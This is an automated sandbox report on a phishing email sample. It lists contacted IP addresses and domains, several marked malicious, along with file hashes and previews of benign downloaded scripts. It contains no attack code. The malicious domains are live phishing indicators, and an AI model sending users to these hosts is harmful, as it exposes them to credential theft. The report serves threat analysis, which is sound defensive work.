                                                                                                                    https://www.facebook.com/tr/?id=138748961041622&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018922220&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018922137&coo=false&rqm=GETfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://linktube.com/_nuxt/b6ccb04ec77bec22f317.jsfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs
                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    13.107.6.156
                                                                                                                    office.comUnited States
                                                                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                    18.164.96.16
                                                                                                                    dexeqbeb7giwr.cloudfront.netUnited States
                                                                                                                    3MIT-GATEWAYSUSfalse
                                                                                                                    104.18.10.207
                                                                                                                    maxcdn.bootstrapcdn.comUnited States
                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                    172.253.63.84
                                                                                                                    unknownUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    142.251.32.99
                                                                                                                    unknownUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    151.101.1.195
                                                                                                                    app.factors.aiUnited States
                                                                                                                    54113FASTLYUSfalse
                                                                                                                    151.101.45.229
                                                                                                                    jsdelivr.map.fastly.netUnited States
                                                                                                                    54113FASTLYUSfalse
                                                                                                                    157.240.241.35
                                                                                                                    star-mini.c10r.facebook.comUnited States
                                                                                                                    32934FACEBOOKUSfalse
                                                                                                                    199.232.36.176
                                                                                                                    stripecdn.map.fastly.netUnited States
                                                                                                                    54113FASTLYUSfalse
                                                                                                                    142.251.40.110
                                                                                                                    unknownUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    13.69.239.79
                                                                                                                    unknownUnited States
                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                    18.164.96.54
                                                                                                                    unknownUnited States
                                                                                                                    3MIT-GATEWAYSUSfalse
                                                                                                                    157.240.241.1
                                                                                                                    scontent.xx.fbcdn.netUnited States
                                                                                                                    32934FACEBOOKUSfalse
                                                                                                                    13.107.9.156
                                                                                                                    b-0004.b-dc-msedge.netUnited States
                                                                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                    172.64.80.1
                                                                                                                    404.ecohmlsdeltiempo.it.comUnited States
                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                    23.219.36.143
                                                                                                                    unknownUnited States
                                                                                                                    20940AKAMAI-ASN1EUfalse
                                                                                                                    162.241.77.32
                                                                                                                    apressa.com.brUnited States
                                                                                                                    46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                    20.190.190.130
                                                                                                                    www.tm.a.prd.aadg.trafficmanager.netUnited States
                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                    104.21.84.118
                                                                                                                    hzofjndpntxsowciisqm.ecohmlsdeltiempo.it.comUnited States
                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                    52.109.0.91
                                                                                                                    unknownUnited States
                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                    142.250.65.170
                                                                                                                    unknownUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    104.17.24.14
                                                                                                                    cdnjs.cloudflare.comUnited States
                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                    1.1.1.1
                                                                                                                    unknownAustralia
                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                    142.251.35.170
                                                                                                                    unknownUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    52.49.17.168
                                                                                                                    stripe.comUnited States
                                                                                                                    16509AMAZON-02USfalse
                                                                                                                    142.250.80.72
                                                                                                                    unknownUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    54.203.153.105
                                                                                                                    unknownUnited States
                                                                                                                    16509AMAZON-02USfalse
                                                                                                                    142.250.80.99
                                                                                                                    unknownUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    34.160.69.120
                                                                                                                    api.factors.aiUnited States
                                                                                                                    2686ATGS-MMD-ASUSfalse
                                                                                                                    213.186.33.16
                                                                                                                    blog.lenodal.comFrance
                                                                                                                    16276OVHFRtrue
                                                                                                                    151.101.2.137
                                                                                                                    code.jquery.comUnited States
                                                                                                                    54113FASTLYUSfalse
                                                                                                                    104.18.11.207
                                                                                                                    stackpath.bootstrapcdn.comUnited States
                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                    52.123.247.79
                                                                                                                    svc.ms-acdc-teams.office.comUnited States
                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                    142.250.65.228
                                                                                                                    www.google.comUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    54.200.22.172
                                                                                                                    m.stripe.comUnited States
                                                                                                                    16509AMAZON-02USfalse
                                                                                                                    43.128.193.10
                                                                                                                    cos.ap-bangkok.myqcloud.comJapan4249LILLY-ASUSfalse
                                                                                                                    104.248.230.249
                                                                                                                    linktube.comUnited States
                                                                                                                    14061DIGITALOCEAN-ASNUSfalse
                                                                                                                    IP
                                                                                                                    192.168.2.16
                                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                                    Analysis ID:1649502
                                                                                                                    Start date and time:2025-03-26 20:53:03 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:19
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:0
                                                                                                                    Technologies:
                                                                                                                    • EGA enabled
                                                                                                                    Analysis Mode:stream
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:phishing.eml
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal56.phis.winEML@33/57@107/305
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .eml
                                                                                                                    • Exclude process from analysis (whitelisted): SIHClient.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.149.20.212
                                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                    • VT rate limit hit for: api.linktube.com
                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):94208
                                                                                                                    Entropy (8bit):4.464570552801731
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:12A5B939E1195767BBDCF608623959D3
                                                                                                                    SHA1:514900BEB08FF35DC3649F0F6FB0C53342EE8D38
                                                                                                                    SHA-256:5162BA58D0D38BCEA3E95533604A0B31C52D3943E83F11EAC61A2B23C564E2EB
                                                                                                                    SHA-512:5F8BBFA2577D24C17F5BACC862B9E656D1C9C9C39081834AEF2C8F957C32A5F87B51D3DF820D25FD9824ACC8CFACAA7C987D7AC4C7E66467F8E776C07A4DFF37
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:............................................................................`..................................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................2..........................v.2._.O.U.T.L.O.O.K.:.1.b.d.0.:.e.b.d.2.d.9.d.f.b.5.c.d.4.f.d.e.9.3.0.1.2.7.f.1.6.b.d.2.2.9.8.3...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.5.0.3.2.6.T.1.5.5.3.4.4.0.0.8.9.-.7.1.2.0...e.t.l.......P.P........................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):16384
                                                                                                                    Entropy (8bit):0.3613836054883338
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:679672A5004E0AF50529F33DB5469699
                                                                                                                    SHA1:427A4EC3281C9C4FAEB47A22FFBE7CA3E928AFB0
                                                                                                                    SHA-256:205D000AA762F3A96AC3AD4B25D791B5F7FC8EFB9056B78F299F671A02B9FD21
                                                                                                                    SHA-512:F8615C5E5CF768A94E06961C7C8BEF99BEB43E004A882A4E384F5DD56E047CA59B963A59971F78DCF4C35D1BB92D3A9BC7055BFA3A0D597635DE1A9CE06A3476
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                    File Type:Microsoft Outlook email folder (>=2003)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):271360
                                                                                                                    Entropy (8bit):4.516662332337723
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:92B0309274DBA49135450D0A9DB0E431
                                                                                                                    SHA1:A20D63858C9E0AA7FC9FD6FC5C5D3FA2CFC151C3
                                                                                                                    SHA-256:0555E31ECE8439411566132A75C84F99D922AF5E66C6592C9056E5375B0A8D50
                                                                                                                    SHA-512:513A588ACF1B2D15F9ECE0484121D390F3E7455E55C608E1E9292E87911389E0DA84A8F20AF9C19502AD02FE0616E920FA3F3F7B7FEEC257D482FCD4D5970303
                                                                                                                    Malicious:true
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:!BDN&.YKSM......\.......@&..............W................@...........@...@...................................@...........................................................................$.......D......."..................................................................................................................................................................................................................................................................................................................................t.....9.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):262144
                                                                                                                    Entropy (8bit):4.36813283128388
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:95A4EAD1C4ADA6431DEFF19362BD5916
                                                                                                                    SHA1:0AF7A9E274C57F3EB9A599F3FEA4B3347CC2302F
                                                                                                                    SHA-256:EFDD3E2277BDA4D76048E0E276E4962A1B70A2C91D6529638412CC549B623633
                                                                                                                    SHA-512:C4F4441C65F0D0625E8570847C5997FCB2D556CA3CA184A7177A751DDAA28E184491A6B691F71ADB94C103D4447F579116AAF311E3F4B400FEB08CE0637D9B05
                                                                                                                    Malicious:true
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:s:Dw0...............l........................#.................................U......................./...............d.......................................................................,.....................................................................................................................................................................................................................................................................................................................................................................`........,.}#0...............l........................#..........L.......................L.......................Z..........X............N.......................O.......................V......d...8............R......\.......$.......@P......\.......(........P......|.......,........Q......T...X...H........S......".......h.......@S......V................O......h.....l..........W......&.....l..........H..........@.l..........H..........@.l.........
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (526), with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):526
                                                                                                                    Entropy (8bit):4.844995662196588
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:D96C709017743C0759CF3853D1806BA5
                                                                                                                    SHA1:72E21587610C49C8305A55E71F73FA88ED618205
                                                                                                                    SHA-256:BA2338AA6670580269C762F51C4291DAEF913201AA8F4D4FD166C1A878262652
                                                                                                                    SHA-512:974E260ED8BD1D99628FC3248F07179F6EA228E37A6B9D3EF906DBA57571F2DF54D73F93D1F3460902D28A90BD4793BCA35477B2EF8FBF424B9112147F04BCCF
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://js.stripe.com/v3/fingerprinted/js/m-outer-15a2b40a058ddff1cffdb63779fe3de1.js
                                                                                                                    Preview:!function(){"use strict";var e="https://m.stripe.network",n=window.location.hash,t=/preview=true/.test(n)?"inner-preview.html":"inner.html",o=document.createElement("iframe");o.src="".concat(e,"/").concat(t).concat(n);var i=function(n){if(n.origin===e){var t=window.opener||window.parent||window;if(!t)return;t.postMessage(n.data,"*")}else o.contentWindow.postMessage(n.data,"*")};window.addEventListener?window.addEventListener("message",i,!1):window.attachEvent("onMessage",i),document.body&&document.body.appendChild(o)}();
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):28
                                                                                                                    Entropy (8bit):4.137537511266052
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:C41A026A97DFC107025EEC7F45F29C85
                                                                                                                    SHA1:B77C8FE6D6A770AF1758FC34B3E716656B8F2485
                                                                                                                    SHA-256:8A7130BC862841606D062AC516513B01EB176CEF37D017E18B54E844E8390029
                                                                                                                    SHA-512:6DE72788DA933F3DA0D1FB315335B8DE1BD9D4F7B59A0F1D1F6E758AB0D1EC3D7F0B8FFCDE16313B555BFE18832FF8671A2159F5AFCEEA6C45C2A037345ED017
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCR1vdIElx-gVEgUNU1WBtRIFDa0JrrEhnebhnWY90qM=?alt=proto
                                                                                                                    Preview:ChIKBw1TVYG1GgAKBw2tCa6xGgA=
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65530), with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):742469
                                                                                                                    Entropy (8bit):5.406793687326116
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:BFAEA686C03759B91A2F6BB9D56B58F8
                                                                                                                    SHA1:CAD4C541608B20B9EE47917D7E38992AF4C574CF
                                                                                                                    SHA-256:D891E466E7E1CB40CDB057F6C0B7330B3DF26806E96FC6F33C6B03AAACC64CB3
                                                                                                                    SHA-512:A495891D353E25EFF7A4E72385C2467D4CAF76A325F2CD4631884469895FB332BFAEF5E5BA6B334B1BC90CD7C7B4C96EF805DFD9EC99656DAC858432E5EE6A45
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://js.stripe.com/v3/
                                                                                                                    Preview:!function(){function e(t){var n=o[t];if(void 0!==n)return n.exports;var a=o[t]={id:t,loaded:!1,exports:{}};return r[t](a,a.exports,e),a.loaded=!0,a.exports}var t,n,r={723:function(e,t,n){"use strict";function r(e){l.length||(i(),!0),l[l.length]=e}function o(){for(;p<l.length;){var e=p;if(p+=1,l[e].call(),p>1024){for(var t=0,n=l.length-p;t<n;t++)l[t]=l[t+p];l.length-=p,p=0}}l.length=0,p=0,!1}function a(e){return function(){function t(){clearTimeout(n),clearInterval(r),e()}var n=setTimeout(t,0),r=setInterval(t,50)}}e.exports=r;var i,c,s,u,l=[],p=0,d=void 0!==n.g?n.g:self,m=d.MutationObserver||d.WebKitMutationObserver;"function"==typeof m?(c=1,s=new m(o),u=document.createTextNode(""),s.observe(u,{characterData:!0}),i=function(){c=-c,u.data=c}):i=a(o),r.requestFlush=i,r.makeRequestCallFromTimer=a},5937:function(e,t,n){e.exports=n.p+"fingerprinted/img/abnamro-4445e65420800f96f68cfc67a273f66b.svg"},1520:function(e,t,n){e.exports=n.p+"fingerprinted/img/asn-3d9b1bbff2f8f12105510992dbb37ae8.svg
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (489)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):675
                                                                                                                    Entropy (8bit):5.103948984894273
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:7F48614A568C2C4A2B3CC47E2727DE2B
                                                                                                                    SHA1:571581507164BAD7F649E7485D98FE42DFDE6389
                                                                                                                    SHA-256:C1F6DBB101582A78B3422FD62CF5D2DF0543BB40E98B6C944296410EC6F61F5B
                                                                                                                    SHA-512:2EB0623D9DC3A896EF5AB46F74B3A46E03C03C2A70C0AEDA32834AAE7CA1BE97C0BD44F7839DCEEDC76F5B4BA9D9A22E02369DD014BD98489440C9C2CFD6FA11
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/brands.min.css
                                                                                                                    Preview:/*!. * Font Awesome Free 5.13.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */.@font-face{font-family:"Font Awesome 5 Brands";font-style:normal;font-weight:400;font-display:block;src:url(../webfonts/fa-brands-400.eot);src:url(../webfonts/fa-brands-400.eot?#iefix) format("embedded-opentype"),url(../webfonts/fa-brands-400.woff2) format("woff2"),url(../webfonts/fa-brands-400.woff) format("woff"),url(../webfonts/fa-brands-400.ttf) format("truetype"),url(../webfonts/fa-brands-400.svg#fontawesome) format("svg")}.fab{font-family:"Font Awesome 5 Brands";font-weight:400}
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (5594)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):65856
                                                                                                                    Entropy (8bit):5.3462189136610885
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:BCF08461FBECB5114D0F6C38039D235E
                                                                                                                    SHA1:136F8B62BBF93EE92360F4CDA85D78AC389EF50A
                                                                                                                    SHA-256:DDA62B3CE6B50AF249C89A805AD3D8E38F725014743DBF939610567DAED1F056
                                                                                                                    SHA-512:E0C6F49A238DD17ADEAFA711E0312BDAD97701B7119D2CC4824F7CE5C0DB9D381008779473AA846DAD0FB1DD18883D4E357F470EFDE910828B54189F5FBD712B
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://connect.facebook.net/signals/config/209431097234591?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C115
                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (483)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):669
                                                                                                                    Entropy (8bit):5.099296234290428
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:2B98E9FE1C909F528FB0D123C9373A76
                                                                                                                    SHA1:D9EC4ED149D7409D5514787C164D508825A13476
                                                                                                                    SHA-256:A4803373F048228FE14AFB4D10322231306D47D11F2B708E9A71F6A6DF1C3C36
                                                                                                                    SHA-512:B976FB4FA3DB75E65F2AB0F778A2E394A654F7979C88CA824532B2930AEB8C021841479F79D2BE8D19328DEE49F63414600EA814B4DF7BDE148F6A4032553065
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/solid.min.css
                                                                                                                    Preview:/*!. * Font Awesome Free 5.13.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */.@font-face{font-family:"Font Awesome 5 Free";font-style:normal;font-weight:900;font-display:block;src:url(../webfonts/fa-solid-900.eot);src:url(../webfonts/fa-solid-900.eot?#iefix) format("embedded-opentype"),url(../webfonts/fa-solid-900.woff2) format("woff2"),url(../webfonts/fa-solid-900.woff) format("woff"),url(../webfonts/fa-solid-900.ttf) format("truetype"),url(../webfonts/fa-solid-900.svg#fontawesome) format("svg")}.fa,.fas{font-family:"Font Awesome 5 Free";font-weight:900}
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):825
                                                                                                                    Entropy (8bit):5.0887540560460485
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:B51DECE6CD43370752F47687229267E1
                                                                                                                    SHA1:A69225CB54BCA14D066515E6A3C0C587C7A9DD9C
                                                                                                                    SHA-256:F2E4F47CC2CF1DE34D89CB729989CA17FCB8B418146B26CE032507B25AF424A4
                                                                                                                    SHA-512:1913A831A6946348ECCDDF203E1354CCC52834AFEFACC2F9D5F39551364501434FD9759000D4702ACEB3AD11E5AD57515B95B57F98B3C9A82CF73A295D862901
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:<!DOCTYPE html>.<html>.<head>. <meta charset="UTF-8" />. <meta name="robots" content="noindex,nofollow,noarchive" />. <title>An Error Occurred: Method Not Allowed</title>. <style>body { background-color: #fff; color: #222; font: 16px/1.5 -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; margin: 0; }..container { margin: 30px; max-width: 600px; }.h1 { color: #dc3545; font-size: 24px; }.h2 { font-size: 18px; }</style>.</head>.<body>.<div class="container">. <h1>Oops! An Error Occurred</h1>. <h2>The server returned a "405 Method Not Allowed".</h2>.. <p>. Something is broken. Please let us know what you were doing when this error occurred.. We will fix it as soon as possible. Sorry for any inconvenience caused.. </p>.</div>.</body>.</html>
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (32065)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):85578
                                                                                                                    Entropy (8bit):5.366055229017455
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                                                    SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                                                    SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                                                    SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                                                                                    Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 17828, version 1.0
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):17828
                                                                                                                    Entropy (8bit):7.988443123197782
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:09739045C57BFF0EEE13DFB69FA87C39
                                                                                                                    SHA1:57427387E75F23AA04C2EA1ACA4DF98B50C4B289
                                                                                                                    SHA-256:D8239D3F39686158DC8D9087B98F198CE669DCA6EBB606DF7F80398EDDE465A6
                                                                                                                    SHA-512:0AB915BF87E0FB933E022FE701DDDEC13C25AC004627D390F74D2FB028C094EC1A32941A46027D76E5C23629F0A65622F8261CFE8FA1844D62D4D6F0862D31CC
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://fonts.gstatic.com/s/prompt/v10/-W_8XJnvUD7dzB2Cv_4IaWMu.woff2
